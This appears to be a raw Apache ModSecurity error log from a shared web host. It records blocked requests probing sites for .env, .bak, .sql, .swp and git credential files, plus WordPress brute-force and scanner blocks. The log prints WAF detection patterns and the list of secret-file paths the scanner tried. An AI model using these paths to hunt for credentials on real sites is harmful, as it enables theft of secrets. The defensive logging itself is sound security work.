[Tue May 26 19:52:14.675839 2026] [security2:error] [pid 86490:tid 86737] [client 77.68.9.24:59736] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 24.9.68.77.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "srsglobalsoft.com"] [uri "/images/images/cache.php"] [unique_id "ahWsllZMwN0DpLVWo6KdVgAAAPo"], referer: www.google.com
[Tue May 26 19:52:14.808346 2026] [security2:error] [pid 86490:tid 86621] [client 185.177.72.53:64532] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/var/backup/.env"] [unique_id "ahWsllZMwN0DpLVWo6KdXQAAAIY"]
[Tue May 26 19:52:15.168336 2026] [security2:error] [pid 86490:tid 86667] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWsllZMwN0DpLVWo6KdWQAAALQ"]
[Tue May 26 19:52:15.616964 2026] [security2:error] [pid 86490:tid 86727] [client 185.177.72.53:64532] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/markets/.env"] [unique_id "ahWsl1ZMwN0DpLVWo6KdfAAAAPA"]
[Tue May 26 19:52:16.262783 2026] [security2:error] [pid 86490:tid 86653] [client 185.177.72.53:64532] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/specs/.env"] [unique_id "ahWsmFZMwN0DpLVWo6KdmQAAAKY"]
[Tue May 26 19:52:16.423084 2026] [security2:error] [pid 86490:tid 86703] [client 185.177.72.53:64532] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/env/template/.env"] [unique_id "ahWsmFZMwN0DpLVWo6KdoAAAANg"]
[Tue May 26 19:52:16.907388 2026] [security2:error] [pid 86490:tid 86638] [client 185.177.72.53:64532] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/github.php.old"] [unique_id "ahWsmFZMwN0DpLVWo6KdtQAAAJc"]
[Tue May 26 19:52:17.166932 2026] [security2:error] [pid 86490:tid 86555] [remote 129.121.76.191:37744] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 191.76.121.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "poonawallatennisacademy.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahWsmVZMwN0DpLVWo6KduAAAykA"]
[Tue May 26 19:52:17.204271 2026] [security2:error] [pid 86490:tid 86594] [remote 178.104.164.71:57938] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 71.164.104.178.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWsmVZMwN0DpLVWo6KdtwAA6Gc"]
[Tue May 26 19:52:17.381828 2026] [security2:error] [pid 86490:tid 86493] [remote 129.121.76.191:37744] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 191.76.121.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "poonawallatennisacademy.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahWsmVZMwN0DpLVWo6KdwwAAoAI"], referer: https://poonawallatennisacademy.moes-art.com/wp-login.php
[Tue May 26 19:52:17.391644 2026] [security2:error] [pid 86490:tid 86687] [client 185.177.72.53:64532] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/var/www/html/wordpress/.env"] [unique_id "ahWsmVZMwN0DpLVWo6KdxAAAAMg"]
[Tue May 26 19:52:17.542511 2026] [security2:error] [pid 86490:tid 86650] [client 57.141.2.51:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWsmVZMwN0DpLVWo6KdvAAAAKM"]
[Tue May 26 19:52:17.553567 2026] [security2:error] [pid 86490:tid 86714] [client 185.177.72.53:64532] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/wp-content/fullbackup.sql"] [unique_id "ahWsmVZMwN0DpLVWo6KdzAAAAOM"]
[Tue May 26 19:52:18.525434 2026] [security2:error] [pid 86490:tid 86657] [client 185.177.72.53:64532] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/backup/site.sql"] [unique_id "ahWsmlZMwN0DpLVWo6Kd4gAAAKo"]
[Tue May 26 19:52:19.335857 2026] [security2:error] [pid 86490:tid 86688] [client 185.177.72.53:64532] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/config/data/users.bak"] [unique_id "ahWsm1ZMwN0DpLVWo6KeAAAAAMk"]
[Tue May 26 19:52:19.658319 2026] [security2:error] [pid 86490:tid 86746] [client 185.177.72.53:64532] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/files/.env"] [unique_id "ahWsm1ZMwN0DpLVWo6KeCQAAAQM"]
[Tue May 26 19:52:20.499228 2026] [security2:error] [pid 86490:tid 86733] [client 77.68.9.24:57413] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 24.9.68.77.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "srsglobalsoft.com"] [uri "/images/images/cache.php"] [unique_id "ahWsnFZMwN0DpLVWo6KeJAAAAPY"], referer: www.google.com
[Tue May 26 19:52:20.777095 2026] [security2:error] [pid 86490:tid 86715] [client 57.141.2.25:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWsnFZMwN0DpLVWo6KeHAAAAOQ"]
[Tue May 26 19:52:20.791857 2026] [security2:error] [pid 86490:tid 86685] [client 185.177.72.53:64532] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(wp-)?config\\\\.(php\\\\.)?(?:bac?k|o(?:ld|rig)|copy|s(?:ave|wp)|vim?\\\\.|~)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1254"] [id "390597"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup config file (disable this rule if you require access to these backup files)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/celery.config.old"] [unique_id "ahWsnFZMwN0DpLVWo6KeLgAAAMY"]
[Tue May 26 19:52:21.114985 2026] [security2:error] [pid 86490:tid 86640] [client 185.177.72.53:64532] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/backend/app/.env"] [unique_id "ahWsnVZMwN0DpLVWo6KeNwAAAJk"]
[Tue May 26 19:52:21.275469 2026] [security2:error] [pid 86490:tid 86740] [client 185.177.72.53:64532] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "web.config"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/painel/web.config"] [unique_id "ahWsnVZMwN0DpLVWo6KeOAAAAP0"]
[Tue May 26 19:52:21.755867 2026] [security2:error] [pid 86490:tid 86713] [client 185.177.72.53:12338] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/site-library/.env"] [unique_id "ahWsnVZMwN0DpLVWo6KeQgAAAOI"]
[Tue May 26 19:52:22.725968 2026] [security2:error] [pid 86490:tid 86689] [client 185.177.72.53:12338] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/restaurant-app/server/.env"] [unique_id "ahWsnlZMwN0DpLVWo6KeZgAAAMo"]
[Tue May 26 19:52:23.051048 2026] [security2:error] [pid 86490:tid 86715] [client 185.177.72.53:12338] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/project/.env.bak"] [unique_id "ahWsn1ZMwN0DpLVWo6KeawAAAOQ"]
[Tue May 26 19:52:23.211035 2026] [security2:error] [pid 86490:tid 86707] [client 185.177.72.53:12338] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/security/.env"] [unique_id "ahWsn1ZMwN0DpLVWo6KecgAAANw"]
[Tue May 26 19:52:23.240759 2026] [security2:error] [pid 86490:tid 86636] [client 57.141.2.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWsnlZMwN0DpLVWo6KeaQAAAJU"]
[Tue May 26 19:52:23.371451 2026] [security2:error] [pid 86490:tid 86740] [client 185.177.72.53:12338] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/subnet/.env"] [unique_id "ahWsn1ZMwN0DpLVWo6KedgAAAP0"]
[Tue May 26 19:52:25.906843 2026] [security2:error] [pid 86490:tid 86680] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWsoVZMwN0DpLVWo6KesQAAAME"]
[Tue May 26 19:52:26.093633 2026] [security2:error] [pid 86490:tid 86712] [client 40.77.167.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "poonawallatennisacademy.com"] [uri "/index.php"] [unique_id "ahWsolZMwN0DpLVWo6KeygAAAOE"]
[Tue May 26 19:52:26.440843 2026] [security2:error] [pid 86490:tid 86706] [client 185.177.72.53:12338] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/pUbLiC/.eNv"] [unique_id "ahWsolZMwN0DpLVWo6Ke0wAAANs"]
[Tue May 26 19:52:27.087270 2026] [security2:error] [pid 86490:tid 86683] [client 185.177.72.53:12338] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/.next/static/development/pages/.env"] [unique_id "ahWso1ZMwN0DpLVWo6Ke6QAAAMQ"]
[Tue May 26 19:52:27.573879 2026] [security2:error] [pid 86490:tid 86743] [client 185.177.72.53:12338] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/vendor/.env.old"] [unique_id "ahWso1ZMwN0DpLVWo6Ke9QAAAQA"]
[Tue May 26 19:52:27.895343 2026] [security2:error] [pid 86490:tid 86680] [client 185.177.72.53:12338] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/site_admin/.env"] [unique_id "ahWso1ZMwN0DpLVWo6KfBgAAAME"]
[Tue May 26 19:52:28.382196 2026] [security2:error] [pid 86490:tid 86709] [client 185.177.72.53:12338] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/config/upload/site.bak"] [unique_id "ahWspFZMwN0DpLVWo6KfEQAAAN4"]
[Tue May 26 19:52:28.567773 2026] [security2:error] [pid 86490:tid 86648] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWspFZMwN0DpLVWo6KfCgAAAKE"]
[Tue May 26 19:52:28.703992 2026] [security2:error] [pid 86490:tid 86657] [client 185.177.72.53:12338] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/public/images/.env"] [unique_id "ahWspFZMwN0DpLVWo6KfHgAAAKo"]
[Tue May 26 19:52:29.030702 2026] [security2:error] [pid 86490:tid 86704] [client 185.177.72.53:12338] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/BACKEND/.env"] [unique_id "ahWspVZMwN0DpLVWo6KfKQAAANk"]
[Tue May 26 19:52:29.515085 2026] [security2:error] [pid 86490:tid 86742] [client 185.177.72.53:12338] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/gcp-key.swp"] [unique_id "ahWspVZMwN0DpLVWo6KfMwAAAP8"]
[Tue May 26 19:52:29.674862 2026] [security2:error] [pid 86490:tid 86659] [client 185.177.72.53:12338] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/spring-app/client/.env"] [unique_id "ahWspVZMwN0DpLVWo6KfNwAAAKw"]
[Tue May 26 19:52:29.996979 2026] [security2:error] [pid 86490:tid 86720] [client 185.177.72.53:12338] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/.git/credentials.bak.bak"] [unique_id "ahWspVZMwN0DpLVWo6KfSAAAAOk"]
[Tue May 26 19:52:30.443558 2026] [security2:error] [pid 86490:tid 86676] [client 54.87.247.130:53630] ModSecurity: Access denied with code 406 (phase 1). Pattern match "python-requests|python-urllib" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "1460"] [id "909111"] [msg "Python UA brute"] [hostname "worldwidecourier.co.in"] [uri "/"] [unique_id "ahWsplZMwN0DpLVWo6KfUgAAAL0"]
[Tue May 26 19:52:31.282255 2026] [security2:error] [pid 86490:tid 86737] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWsplZMwN0DpLVWo6KfYgAAAPo"]
[Tue May 26 19:52:31.655261 2026] [security2:error] [pid 86490:tid 86728] [client 113.172.214.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWsp1ZMwN0DpLVWo6KfagAAAPE"]
[Tue May 26 19:52:31.777778 2026] [security2:error] [pid 86490:tid 86716] [client 185.177.72.53:12338] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/error.log.bak"] [unique_id "ahWsp1ZMwN0DpLVWo6KffQAAAOU"]
[Tue May 26 19:52:31.937925 2026] [security2:error] [pid 86490:tid 86671] [client 185.177.72.53:12338] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/database.bak"] [unique_id "ahWsp1ZMwN0DpLVWo6KfhQAAALg"]
[Tue May 26 19:52:32.098367 2026] [security2:error] [pid 86490:tid 86707] [client 185.177.72.53:12338] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/laravel.log.bak"] [unique_id "ahWsqFZMwN0DpLVWo6KfjwAAANw"]
[Tue May 26 19:52:32.344307 2026] [security2:error] [pid 86490:tid 86616] [remote 208.109.188.137:52668] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 137.188.109.208.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bloggertarget.com"] [uri "/wp-login.php"] [unique_id "ahWsqFZMwN0DpLVWo6KfkAAA9n0"]
